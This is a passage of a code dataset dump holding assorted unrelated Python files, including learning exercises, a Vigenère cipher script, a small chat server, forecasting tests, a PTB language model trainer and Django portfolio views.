dt.datetime.now()\n\ndef decompose(n):\n m = 2 * n - 1\n for i in range(int(m ** 0.5),int(n ** 0.5),-1):\n result = [n-1,i]\n p = m - i ** 2\n while p:\n result.append(int(p ** 0.5))\n p -= int(p ** 0.5) ** 2\n if len(result) == len(set(result)):\n return result[::-1]\n return None\n\nprint(decompose(44))\n\nend = dt.datetime.now()\nprint(end - start)\n","sub_path":"Learning_files/Python/Unfinished/Square_into_Squares.py","file_name":"Square_into_Squares.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"242685421","text":"import random\n\nalphabet = 
['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T',\n 'U','V','W','X','Y','Z','a','b','c','d','e','f','g','h','i','j','k','l','m','n',\n 'o','p','q','r','s','t','u','v','w','x','y','z','Ä','Ö','Ü','ä','ö','ü','0','1',\n '2','3','4','5','6','7','8','9',' ','.',',','?','!',':',';','\\'','-','_','/','+',\n '*','(',')','{','}','[',']','É','È','Ê','é','è','ê','<','>'\n ]\n\n\ndef menu():\n option = int(input('1. Generate random key\\n2. Encrypt with Key\\n3. Decrypt with key\\n4. Exit\\n\\nOption: '))\n if(option == 1):\n key = generateRandomKey()\n try:\n input('Your key is ->{}<-\\nPress ENTER to continue'.format(key))\n except:\n menu()\n elif(option == 2):\n encrypt()\n elif(option == 3):\n decrypt()\n elif(option == 4):\n exit()\n else:\n try:\n input('\\nBad input\\nPress ENTER to go back to the menu: ')\n except:\n menu()\n\ndef generateRandomKey(input_length = -101):\n random_key = ''\n if input_length == -101:\n key_length = int(input('Enter length of key: '))\n else: \n key_length = input_length\n for i in range(0,key_length):\n random_key += random.choice(alphabet)\n return random_key\n\ndef encrypt():\n original_message = str(input('Enter the message, that you want to encrypt: '))\n original_message = original_message\n option_key = int(input('1. Generate key\\n2. Enter given key\\nOption: '))\n encrypt_key = \"\"\n if(option_key == 1):\n encrypt_key = generateRandomKey(len(original_message))\n elif(option_key == 2):\n encrypt_key = str(input('Enter the key to encrypt and decrypt the message: '))\n encrypted_message = ''\n for i in range (0,len(original_message)):\n if original_message[i] not in alphabet:\n print('Caught')\n original_message = original_message[0:i] + '_' + original_message[i+1:len(original_message)]\n new_position = alphabet.index(original_message[i])+alphabet.index(encrypt_key[i%len(encrypt_key)])\n if new_position > len(alphabet)-1:\n new_position = new_position - len(alphabet)\n encrypted_message += alphabet[new_position]\n print('\\nOriginal message: ->{}<-\\nEncrypted message: ->{}<-\\nKey: ->{}<-\\n'.format(original_message,encrypted_message,encrypt_key))\n input('Press enter to continue')\n menu()\n\ndef decrypt():\n encrypted_message = str(input('Enter the message, that you want to decrypt: '))\n encrypted_message = encrypted_message\n encrypt_key = str(input('Enter the key: '))\n original_message = ''\n for i in range (0,len(encrypted_message)):\n new_position = alphabet.index(encrypted_message[i])-alphabet.index(encrypt_key[i%len(encrypt_key)])\n # if new_position < 0:\n # new_position = new_position + len(alphabet)\n original_message += alphabet[new_position]\n \n\n print('\\nOriginal message: ->{}<-\\n'.format(original_message))\n input('Press enter to continue')\n menu()\n\nmenu()\n \n","sub_path":"vigenere.py","file_name":"vigenere.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"120537807","text":"__author__ = 'user'\n\nfrom socketserver import ThreadingTCPServer, StreamRequestHandler\n\nPORT = 2000\nIP = '127.0.0.1'\n\n\nclass MyRequestHandler(StreamRequestHandler):\n def handle(self):\n # 채팅 이용자 체크\n cnt = 0\n conn = self.request\n # 사용자 이름\n name = conn.recv(1024)\n # print('connection from', self.client_address)\n print(name.decode('utf-8') + '님이 입장하셨습니다!')\n # 사용자가 입장했으므로 카운트 증가\n cnt += 1\n while True:\n buf = conn.recv(1024)\n if not buf:\n pass\n # 퇴장\n elif buf.decode('utf-8') == 'EXIT':\n 
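# A minimal sketch of the index arithmetic behind the vigenere.py record above:
# encrypt adds alphabet positions and wraps, decrypt subtracts. The record wraps
# by hand (and leans on Python's negative indexing when decrypting); the %
# operator handles both directions in one step. The 4-letter alphabet here is
# illustrative only, not the record's alphabet.
ABC = ['A', 'B', 'C', 'D']

def shift(ch, key_ch, sign=1):
    # sign=1 encrypts, sign=-1 decrypts; % keeps the index inside the alphabet
    return ABC[(ABC.index(ch) + sign * ABC.index(key_ch)) % len(ABC)]

assert shift('D', 'B') == 'A'                   # 3 + 1 wraps around to 0
assert shift(shift('C', 'D'), 'D', -1) == 'C'   # decrypt undoes encrypt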
print(name.decode('utf-8') + '님이 퇴장하셨습니다!')\n cnt -= 1\n # 카운트가 0이면 채팅 이용자가 없으므로 서버 종료\n # 서버(스레드) 종료 함수를 잘모르겠다\n # 왠지 shutdown() 함수는 강제종료인것같다\n # 정상 종료 함수 없나?\n if (0 == cnt):\n server.shutdown()\n return\n else:\n # 사용자들이 입력한 문자열을 UTF-8로 인코딩하여 출력\n print(name.decode('utf-8') + ' : ' + buf.decode('utf-8'))\n\n\nserver = ThreadingTCPServer((IP, PORT), MyRequestHandler)\nprint('listening on port', PORT)\nserver.serve_forever()\n# 이 함수가 스레드 종료 함수 아닌가?\n# server.server_close()\n","sub_path":"chatting/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"66972932","text":"from functools import partial\nfrom pathlib import Path\nimport types\n\nimport pandas as pd\n# from pandas.util.testing import assert_series_equal\n\nimport pytest\n\nfrom solarforecastarbiter.io import nwp\nfrom solarforecastarbiter.reference_forecasts import models\n\n\nlatitude = 32.2\nlongitude = -110.9\nelevation = 700\ninit_time = pd.Timestamp('20190515T0000Z')\nstart = pd.Timestamp('20190515T0700Z')\nend_short = pd.Timestamp('20190515T1200Z')\n# gfs is longer, but mixed intervals fails\nend_long = pd.Timestamp('20190520T0000Z')\n\nxfail_g2sub = pytest.mark.xfail(reason='ghi does not exist in g2sub')\n\nBASE_PATH = Path(nwp.__file__).resolve().parents[0] / 'tests/data'\nLOAD_FORECAST = partial(nwp.load_forecast, base_path=BASE_PATH)\n\n\n@pytest.mark.parametrize('model', [\n pytest.param(models.gfs_quarter_deg_3hour_to_hourly_mean,\n marks=pytest.mark.xfail(reason='gfs_3h not available')),\n pytest.param(models.rap_ghi_to_hourly_mean, marks=xfail_g2sub),\n pytest.param(models.rap_ghi_to_instantaneous, marks=xfail_g2sub)\n])\ndef test_default_load_forecast_failures(model):\n model(\n latitude, longitude, elevation, init_time, start, end_long,\n load_forecast=LOAD_FORECAST)\n\n\ndef check_out(out, start, end, end_strict=True):\n # check times\n for o in out[0:5]:\n assert isinstance(o, pd.Series)\n assert o.index[0] == start\n if end_strict:\n assert o.index[-1] == end\n else:\n assert o.index[-1] <= end\n # check irradiance limits\n for o in out[0:3]:\n assert (o >= 0).all() and (o < 1300).all()\n # check temperature limits\n assert (out[3] > -40).all() and (out[3] < 60).all()\n # check wind speed limits\n assert (out[4] >= 0).all() and (out[4] < 60).all()\n # check resampling function\n assert isinstance(out[5], partial)\n assert isinstance(out[6], (types.FunctionType, partial))\n\n\n@pytest.mark.parametrize('model', [\n models.gfs_quarter_deg_hourly_to_hourly_mean,\n models.gfs_quarter_deg_to_hourly_mean,\n models.hrrr_subhourly_to_hourly_mean,\n models.hrrr_subhourly_to_subhourly_instantaneous,\n models.nam_12km_cloud_cover_to_hourly_mean,\n models.nam_12km_hourly_to_hourly_instantaneous,\n models.rap_cloud_cover_to_hourly_mean,\n])\n@pytest.mark.parametrize('end,end_strict', [\n (end_short, True), (end_long, False)\n])\ndef test_models(model, end, end_strict):\n out = model(\n latitude, longitude, elevation, init_time, start, end,\n load_forecast=LOAD_FORECAST)\n check_out(out, start, end, end_strict=end_strict)\n\n\n@pytest.mark.parametrize('start,end', [\n ('20190515T0100Z', '20190520T0000Z'),\n ('20190520T0300Z', '20190522T0000Z'),\n ('20190525T1200Z', '20190531T0000Z'),\n ('20190525T1200Z', '20190531T0000Z'),\n])\ndef test_gfs_quarter_deg_to_hourly_mean(start, end):\n start = pd.Timestamp(start)\n end = pd.Timestamp(end)\n out = models.gfs_quarter_deg_to_hourly_mean(\n latitude, 
longitude, elevation, init_time, start, end,\n load_forecast=LOAD_FORECAST)\n check_out(out, start, end, end_strict=True)\n\n\n@pytest.mark.parametrize('model', [\n 'hrrr_hourly',\n 'hrrr_subhourly',\n 'gfs_0p25',\n 'rap',\n 'nam_12km'\n])\ndef test_domain_limits(model):\n # test file has longitudes ranging from -110.50 to -110.35\n # at midlatitudes, a degree of longitude is approximately 85 km\n # a 10 degree difference is then 850 km.\n # nwp.load_forecast calls lat/lon look up with max dist of 500 km\n with pytest.raises(ValueError):\n LOAD_FORECAST(latitude, -120.5, init_time, start, end_short, model)\n","sub_path":"solarforecastarbiter/reference_forecasts/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"6967766","text":"#Comparision of Numbers\r\n\r\n\r\nimport tkinter as tk\r\n\r\nwindow=tk.Tk()\r\nwindow.title(\"Compare numbers\")\r\nwindow.geometry(\"300x300\")\r\n\r\n\r\ndef btn_largest():\r\n num1=txtno1.get()\r\n num2=txtno2.get()\r\n num3=txtno3.get()\r\n\r\n if (num1 > num2) and (num1 > num3):\r\n answer.configure(text=num1)\r\n\r\n elif (num2 > num3) and (num2 > num3):\r\n answer.configure(text=num2)\r\n else:\r\n answer.configure(text=num3)\r\n\r\n\r\ndef btn_smallest():\r\n num1 = txtno1.get()\r\n num2 = txtno2.get()\r\n num3 = txtno3.get()\r\n if (num1 < num2) and (num2 < num3):\r\n answer.configure(text=num1)\r\n\r\n elif (num2 < num3)and (num2 < num3):\r\n answer.configure(text=num2)\r\n else:\r\n answer.configure(text=num3)\r\n\r\n\r\nlblno1 = tk.Label(text=\"NO1\",width=\"6\")\r\nlblno1.grid(columnspan=2,ipadx=\"5\",ipady=\"5\")\r\n\r\nlblno2 = tk.Label(text=\"NO2\",width=\"6\")\r\nlblno2.grid(columnspan=2,ipadx=\"5\",ipady=\"5\")\r\n\r\nlblno3 = tk.Label(text=\"NO3\",width=\"6\")\r\nlblno3.grid(columnspan=2,ipadx=\"5\",ipady=\"5\")\r\n\r\ntxtno1 = tk.Entry(window,width=\"6\")\r\ntxtno1.grid(row=0,column=2,columnspan=2,ipadx=\"5\",ipady=\"5\")\r\n\r\ntxtno2 = tk.Entry(window,width=\"6\")\r\ntxtno2.grid(row=1,column=2,columnspan=2,ipadx=\"5\",ipady=\"5\")\r\n\r\n\r\ntxtno3 = tk.Entry(window,width=\"6\")\r\ntxtno3.grid(row=2,column=2,columnspan=2,ipadx=\"5\",ipady=\"5\")\r\n\r\nbtnlarge = tk.Button(window,text=\" LARGEST\",width=\"3\",command=btn_largest)\r\nbtnlarge.grid(row=3,column=0,ipadx=\"5\",ipady=\"5\")\r\n\r\nbtnsmall = tk.Button(text=\"SMALLEST\",width=\"3\",command=btn_smallest)\r\nbtnsmall.grid(row=3,column=1,ipadx=\"5\",ipady=\"5\")\r\n\r\nanswer = tk.Label(window,text=\"-------\",width=\"6\")\r\nanswer.grid(row=4,column=1,columnspan=2,ipadx=\"5\",ipady=\"5\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nwindow.mainloop()\r\n","sub_path":"Python_Foundation/Comparison_of_Numbers_tkinter.py","file_name":"Comparison_of_Numbers_tkinter.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"2722897","text":"# Created by PyCharm Pro Edition \r\n# User: Kaushik Talukdar \r\n# Date: 24-04-2017 \r\n# Time: 05:03 PM\r\n\r\n# What if we need both Car() & ElectricCar() in this program? 
Importing both individually will be a long cut if we can\r\n# import the entire module in 1 go.\r\n\r\nimport e_car\r\n\r\nmy_car = e_car.Car(\"Maruti\", \"WagonR\", \"2013\")\r\ncar_name = my_car.get_descriptive_name()\r\nprint(car_name)\r\n\r\nmy_future_car = e_car.ElectricCar(\"Tesla\", \"Model S\", \"2020\")\r\nmy_future_car.check_battery_status()\r\n\r\n","sub_path":"8. Class/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"65891909","text":"class Solution:\n    def isSubsequence(self, s: str, t: str) -> bool:\n        #思路 双指针 遍历t跟s,当s跑完,t没跑完就成功,否则失败\n        len_s = len(s)\n        len_t = len(t)\n        #i point to s\n        i = 0\n        #j point to t\n        j = 0\n        while i < len_s and j < len_t:\n            if s[i] == t[j]:\n                i += 1\n            j += 1\n        return i >=len_s","sub_path":"Week_03/392. 判断子序列.py","file_name":"392. 判断子序列.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"274019657","text":"# THIS FILE IS SAFE TO EDIT. It will not be overwritten when rerunning go-raml.\nimport os\n\nfrom flask import request, redirect\nfrom ..flask_itsyouonline import requires_auth\n\nimport json as JSON\nimport jsonschema\nfrom jsonschema import Draft4Validator\nfrom ..models import Farmer, Location\nfrom .reverse_geocode import reverse_geocode\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nFarmer_schema = JSON.load(open(dir_path + '/schema/Farmer_schema.json'))\nFarmer_schema_resolver = jsonschema.RefResolver('file://' + dir_path + '/schema/', Farmer_schema)\nFarmer_schema_validator = Draft4Validator(Farmer_schema, resolver=Farmer_schema_resolver)\n\n\n@requires_auth(org_from_request=True)\ndef RegisterFarmerHandler():\n    wallet_addresses = []\n    address = request.args.get('walletAddress')\n    if address:\n        wallet_addresses.append(address)\n    \n\n    farmer = Farmer(name=request.args['name'], iyo_organization=request.args['organization'], wallet_addresses=wallet_addresses)\n\n    farmAddress = request.args.get('farmAddress')\n    if farmAddress:\n        lat, lng = [float(x.strip()) for x in farmAddress.split(\",\")]\n        continent, country, city = reverse_geocode(lat, lng)\n    \n        if continent and country and city:\n            farmer.location = Location()\n            farmer.location.country = country\n            farmer.location.continent = continent\n            farmer.location.city = city\n            farmer.location.longitude = lng\n            farmer.location.latitude = lat\n\n    farmer.save()\n    return redirect('/farm_registered')\n","sub_path":"JumpScale9Lib/servers/grid_capacity/server/handlers/RegisterFarmerHandler.py","file_name":"RegisterFarmerHandler.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"442421904","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.ticker import (MultipleLocator, AutoMinorLocator)\n\nclass Point:\n    def __init__(self, seq, rssi, lqi):\n        self.seq = seq\n        self.rssi = rssi\n        self.lqi = lqi\n\nHost1 = '0f2a.7d13.0074.1200'\nHost2 = '0012.4b00.060d.b459'\nHost3 = '0012.4b00.060d.b5f0'\n\nKeyToLook = 'Packet Buffer =>'\nPWD = ''\nRange = 500\n\ndef extractPacketData(filename):\n    file_node_lines = filename.readlines()\n    node_points_h1 = []\n    node_points_h2 = []\n    node_points_h3 = []\n\n    for line in file_node_lines:\n        if (Host1 in line):\n            lineAsList = line.split(' ')\n            seq = lineAsList[-7]\n            rssi = int(lineAsList[-4])\n            lqi = int(lineAsList[-1][:2])\n            p = Point(seq, rssi, lqi)\n            # node_points_h1.append(p)\n            
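# A quick standalone check of the two-pointer subsequence test from the 392
# record above, freed from the LeetCode Solution wrapper; the test strings are
# illustrative:
def is_subsequence(s, t):
    i = 0
    for ch in t:                 # scan t once, advancing i only on a match
        if i < len(s) and s[i] == ch:
            i += 1
    return i == len(s)           # s is a subsequence iff it was fully consumed

assert is_subsequence("abc", "ahbgdc") is True
assert is_subsequence("axc", "ahbgdc") is False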
node_points_h1.append(rssi)\n elif (Host2 in line):\n lineAsList = line.split(' ')\n seq = lineAsList[-7]\n rssi = int(lineAsList[-4])\n lqi = int(lineAsList[-1][:2])\n p = Point(seq, rssi, lqi)\n # node_points_h2.append(p)\n node_points_h2.append(rssi)\n elif (Host3 in line):\n lineAsList = line.split(' ')\n seq = lineAsList[-7]\n rssi = int(lineAsList[-4])\n lqi = int(lineAsList[-1][:2])\n p = Point(seq, rssi, lqi)\n # node_points_h3.append(p)\n node_points_h3.append(rssi)\n \n return (node_points_h1, node_points_h2, node_points_h3)\n\nFil1 = open('Sky.txt', 'r')\nFil2 = open('Node1.txt', 'r')\nEves = open('Eaves.txt', 'r')\n\n(F1_H1, F1_H2, F1_H3) = extractPacketData(Fil1)\n(F2_H1, F2_H2, F2_H3) = extractPacketData(Fil2)\n(F3_H1, F3_H2, F3_H3) = extractPacketData(Eves)\n\nf, (ax1, ax2) = plt.subplots(1, 2, sharey=True)\n\nf.suptitle(\"Eaves Atenna near Attenuator with -10dBm transmit power\", fontsize=\"x-large\")\n\nax1.plot(F3_H1[:79])\nax1.plot(F2_H1[:79])\nax1.legend(['RSSI @ Eaves node', 'RSSI @ Zolertia'])\nax1.set_title('Transmission from TelosB')\nax1.set_xlabel('Sequence number of packet')\nax1.set_ylabel('RSSI Value')\nax1.grid(True)\nax1.yaxis.set_minor_locator(MultipleLocator(5))\n\nax2.plot(F3_H2[:79])\nax2.plot(F1_H2[:79])\nax2.legend(['RSSI @ Eaves node', 'RSSI @ Telos B'])\nax2.set_title('Transmission from Zolertia')\nax2.set_xlabel('Sequence number of packet')\nax2.set_ylabel('RSSI Value')\nax2.grid(True)\nax2.yaxis.set_minor_locator(MultipleLocator(5))\n\nplt.show()\n","sub_path":"phantom-node-sky_Datalogs/Sky-Near-Junction/dataprocessor.py","file_name":"dataprocessor.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"640339793","text":"\nimport asynctest\n\nfrom opsdroid.message import Message\nfrom opsdroid.connector import Connector\n\n\nclass TestMessage(asynctest.TestCase):\n \"\"\"Test the opsdroid message class.\"\"\"\n\n async def test_message(self):\n mock_connector = Connector({})\n message = Message(\"Hello world\", \"user\", \"default\", mock_connector)\n\n self.assertEqual(message.text, \"Hello world\")\n self.assertEqual(message.user, \"user\")\n self.assertEqual(message.room, \"default\")\n with self.assertRaises(NotImplementedError):\n await message.respond(\"Goodbye world\")\n\n async def test_response_effects(self):\n \"\"\"Responding to a message shouldn't change the message.\"\"\"\n mock_connector = Connector({})\n message_text = \"Hello world\"\n message = Message(message_text, \"user\", \"default\", mock_connector)\n with self.assertRaises(NotImplementedError):\n await message.respond(\"Goodbye world\")\n self.assertEqual(message_text, message.text)\n","sub_path":"tests/test_message.py","file_name":"test_message.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"281128144","text":"import os\n\nimport fastestimator as fe\nimport numpy as np\nimport tensorflow as tf\nimport wget\nfrom fastestimator.op.tensorop.model import ModelOp, UpdateOp\nfrom fastestimator.schedule import cosine_decay\nfrom fastestimator.trace.adapt import LRScheduler\n\n\ndef get_ptb(folder_path, seq_length=64):\n file_names = [\"ptb.train.txt\", \"ptb.valid.txt\", \"ptb.test.txt\"]\n urls = [\n 'https://raw.githubusercontent.com/wojzaremba/lstm/master/data/ptb.train.txt',\n 'https://raw.githubusercontent.com/wojzaremba/lstm/master/data/ptb.valid.txt',\n 
'https://raw.githubusercontent.com/wojzaremba/lstm/master/data/ptb.test.txt'\n ]\n # Read text\n texts = []\n for file_name, url in zip(file_names, urls):\n text = []\n file_path = os.path.join(folder_path, file_name)\n if not os.path.exists(file_path):\n wget.download(url, out=folder_path)\n with open(file_path, 'r') as f:\n for line in f:\n text.extend(line.split() + [''])\n texts.append(text)\n # Build dictionary from training data\n vocab = sorted(set(texts[0]))\n word2idx = {u: i for i, u in enumerate(vocab)}\n idx2word = np.array(vocab)\n\n #convert word to index and split the sequences and discard the last incomplete sequence\n data = [[word2idx[word] for word in text[:-(len(text) % seq_length)]] for text in texts]\n train_data, eval_data, test_data = [np.array(d).reshape(-1, seq_length) for d in data]\n return train_data, eval_data, test_data\n\n\nclass CreateInputAndTarget(fe.op.numpyop.NumpyOp):\n def forward(self, data, state):\n x = data\n return x[:-1], x[1:]\n\n\nclass SparseCrossEntropy(fe.op.tensorop.TensorOp):\n def forward(self, data, state):\n y_pred, y = data\n loss = tf.keras.losses.sparse_categorical_crossentropy(y, y_pred, from_logits=True)\n return tf.reduce_mean(loss)\n\n\nclass Perplexity(fe.trace.Trace):\n def on_epoch_end(self, data):\n ce = data[\"ce\"]\n data.write_with_log(self.outputs[0], np.exp(ce))\n\n\ndef build_model(vocab_size, embedding_dim, rnn_units, batch_size):\n model = tf.keras.Sequential([\n tf.keras.layers.Embedding(vocab_size, embedding_dim, batch_input_shape=[batch_size, None]),\n tf.keras.layers.LSTM(rnn_units, return_sequences=True, recurrent_initializer='glorot_uniform'),\n tf.keras.layers.Dropout(0.5),\n tf.keras.layers.Dense(vocab_size)\n ])\n return model\n\n\ndef get_estimator(init_lr, data_dir, seq_length=20, batch_size=128, vocab_size=10000, epochs=98):\n train_data, _, test_data = get_ptb(folder_path=data_dir, seq_length=seq_length + 1)\n pipeline = fe.Pipeline(train_data=fe.dataset.NumpyDataset(data={\"x\": train_data}),\n eval_data=fe.dataset.NumpyDataset(data={\"x\": test_data}),\n batch_size=batch_size,\n ops=CreateInputAndTarget(inputs=\"x\", outputs=(\"x\", \"y\")),\n drop_last=True)\n # step 2\n model = fe.build(model_fn=lambda: build_model(vocab_size, embedding_dim=300, rnn_units=600, batch_size=batch_size),\n optimizer_fn=lambda: tf.optimizers.SGD(init_lr, momentum=0.9)) #1.0, 0.1, 0.01\n network = fe.Network(ops=[\n ModelOp(model=model, inputs=\"x\", outputs=\"y_pred\"),\n SparseCrossEntropy(inputs=(\"y_pred\", \"y\"), outputs=\"ce\"),\n UpdateOp(model=model, loss_name=\"ce\")\n ])\n # step 3\n traces = [\n Perplexity(inputs=\"ce\", outputs=\"perplexity\", mode=\"eval\"),\n LRScheduler(model=model,\n lr_fn=lambda epoch: cosine_decay(epoch, cycle_length=epochs, init_lr=init_lr))\n ]\n\n estimator = fe.Estimator(pipeline=pipeline, network=network, epochs=epochs, traces=traces)\n return estimator","sub_path":"source/normal_compare/language_modeling/cosine_decay.py","file_name":"cosine_decay.py","file_ext":"py","file_size_in_byte":3785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"410947613","text":"# coding: utf-8\n\n# Faça um programa que peça um numero inteiro positivo e em seguida mostre este numero invertido.\n# Exemplo:\n# 12376489\n# => 98467321\n\nn = int(input(\"Digite um número inteiro: \"))\n\nnStr = str(n)\nnStrInvertida = ''\n\nfor i in range(len(nStr)-1, -1, -1):\n nStrInvertida += nStr[i]\n\nnInvertida = 
int(nStrInvertida)\n\nprint(nInvertida)\n","sub_path":"PythonBrasil/03_EstruturaDeRepeticao/48.py","file_name":"48.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"549867696","text":"from typing import List\n\n\nclass Solution:\n \"\"\"\n 1122. 数组的相对排序\n https://leetcode-cn.com/problems/relative-sort-array/\n 给你两个数组,arr1 和 arr2,\n - arr2 中的元素各不相同\n - arr2 中的每个元素都出现在 arr1 中\n 对 arr1 中的元素进行排序,使 arr1 中项的相对顺序和 arr2 中的相对顺序相同。未在 arr2 中出现过的元素需要按照升序放在 arr1 的末尾。\n \"\"\"\n def relativeSortArray(self, arr1: List[int], arr2: List[int]) -> List[int]:\n cur = 0\n ext = len(arr2)\n for i in arr2:\n for j in range(len(arr1)):\n if i == arr1[j]:\n arr1[cur], arr1[j] = arr1[j], arr1[cur]\n cur += 1\n\n # 快排\n self.sortRange(arr1, cur, len(arr1) - 1)\n return arr1\n\n def sortRange(self, arr, left, right):\n if left < right:\n p = self.position(arr, left, right)\n self.sortRange(arr, left, p - 1)\n self.sortRange(arr, p + 1, right)\n return arr\n\n def position(self, arr, left ,right):\n pivot = left\n idx = pivot + 1\n for i in range(idx, right + 1):\n if arr[i] < arr[pivot]:\n arr[i], arr[idx] = arr[idx], arr[i]\n idx += 1\n\n arr[pivot], arr[idx - 1] = arr[idx - 1], arr[pivot]\n return idx - 1\n\n\nso = Solution()\n# [2,2,2,1,4,3,3,9,6,7,19]\nprint(so.relativeSortArray([2,3,1,3,2,4,6,19,9,2,7, 12, 10, 7], [2,1,4,3,9,6]))\n","sub_path":"sort.relative-sort-array.py","file_name":"sort.relative-sort-array.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"515339982","text":"# Create your views here.\n\nfrom .models import DematSum\n\nfrom django.views.generic.list import ListView\n\nfrom django.db.models import OuterRef, Subquery, Count, Sum\nfrom django.db.models.functions import Trim, Lower, Round\n\nfrom django_gotolong.amfi.models import Amfi\nfrom django_gotolong.greco.models import Greco\n\nimport pandas as pd\nimport csv, io\nimport openpyxl\nfrom django.contrib import messages\nfrom django.urls import reverse\nfrom django.http import HttpResponseRedirect\n\nfrom django_gotolong.lastrefd.models import Lastrefd, lastrefd_update\n\n\nclass DematSumListView(ListView):\n model = DematSum\n\n # if pagination is desired\n # paginate_by = 300\n\n queryset = DematSum.objects.all()\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\n\nclass DematSumTickerView(ListView):\n model = DematSum\n\n # if pagination is desired\n # paginate_by = 300\n\n # select required columns instead of all columns\n queryset = DematSum.objects.values('stock_symbol')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\n\nclass DematSumRankView(ListView):\n # model = DematSum\n\n # if pagination is desired\n # paginate_by = 300\n\n # amfi_qset = Amfi.objects.filter(comp_isin=OuterRef('pk'))\n # queryset = DematSum.objects.annotate(comp_rank=Subquery(amfi_qset.values('comp_rank'))).order_by('comp_rank')\n # queryset = DematSum.objects.annotate(comp_rank=Subquery(amfi_qset.values('comp_rank')))\n amfi_qs = Amfi.objects.filter(comp_isin=OuterRef(\"isin_code_id\"))\n queryset = DematSum.objects.all(). \\\n annotate(comp_rank=Subquery(amfi_qs.values('comp_rank')[:1])). \\\n annotate(cap_type=Lower(Trim(Subquery(amfi_qs.values('cap_type')[:1])))). \\\n values('stock_symbol', 'comp_name', 'value_cost', 'comp_rank', 'cap_type'). 
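# The relativeSortArray record above ends with a hand-rolled quicksort whose
# position() is a Lomuto-style partition: the pivot is taken from the left and
# idx marks the boundary of elements known to be smaller. The same partition on
# its own (sample data illustrative):
def partition(arr, left, right):
    pivot = arr[left]
    idx = left + 1                      # next slot for an element < pivot
    for i in range(idx, right + 1):
        if arr[i] < pivot:
            arr[i], arr[idx] = arr[idx], arr[i]
            idx += 1
    arr[left], arr[idx - 1] = arr[idx - 1], arr[left]
    return idx - 1                      # pivot's final position

a = [3, 1, 4, 1, 5]
p = partition(a, 0, len(a) - 1)
assert a[p] == 3 and all(x < 3 for x in a[:p]) and all(x >= 3 for x in a[p + 1:])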
\\\n order_by('comp_rank')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n return context\n\n\nclass DematSumRecoView(ListView):\n # model = DematSum\n\n # if pagination is desired\n # paginate_by = 300\n\n # amfi_qset = Amfi.objects.filter(comp_isin=OuterRef('pk'))\n # queryset = DematSum.objects.annotate(comp_rank=Subquery(amfi_qset.values('comp_rank'))).order_by('comp_rank')\n # queryset = DematSum.objects.annotate(comp_rank=Subquery(amfi_qset.values('comp_rank')))\n amfi_qs = Amfi.objects.filter(comp_isin=OuterRef(\"isin_code_id\"))\n greco_qs = Greco.objects.filter(reco_isin=OuterRef(\"isin_code_id\"))\n queryset = DematSum.objects.all(). \\\n annotate(comp_rank=Subquery(amfi_qs.values('comp_rank')[:1])). \\\n annotate(cap_type=Lower(Trim(Subquery(amfi_qs.values('cap_type')[:1])))). \\\n annotate(reco_type=Subquery(greco_qs.values('reco_type')[:1])). \\\n annotate(reco_cause=Subquery(greco_qs.values('reco_cause')[:1])). \\\n values('stock_symbol', 'comp_name', 'value_cost', 'comp_rank', 'cap_type', 'reco_type',\n 'reco_cause'). \\\n order_by('comp_rank')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n return context\n\n\nclass DematSumAmountView(ListView):\n # model = DematSum\n\n # if pagination is desired\n # paginate_by = 300\n\n # amfi_qset = Amfi.objects.filter(comp_isin=OuterRef('pk'))\n # queryset = DematSum.objects.annotate(comp_rank=Subquery(amfi_qset.values('comp_rank'))).order_by('comp_rank')\n # queryset = DematSum.objects.annotate(comp_rank=Subquery(amfi_qset.values('comp_rank')))\n queryset = DematSum.objects.all(). \\\n values('comp_name', 'value_cost'). \\\n order_by('-value_cost')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n return context\n\n\nclass DematSumCapTypeView(ListView):\n # model = DematSum\n\n # if pagination is desired\n # paginate_by = 300\n\n # amfi_qset = Amfi.objects.filter(comp_isin=OuterRef('pk'))\n # queryset = DematSum.objects.annotate(comp_rank=Subquery(amfi_qset.values('comp_rank'))).order_by('comp_rank')\n # queryset = DematSum.objects.annotate(comp_rank=Subquery(amfi_qset.values('comp_rank')))\n amfi_qs = Amfi.objects.filter(comp_isin=OuterRef(\"isin_code_id\"))\n queryset = DematSum.objects.all(). \\\n 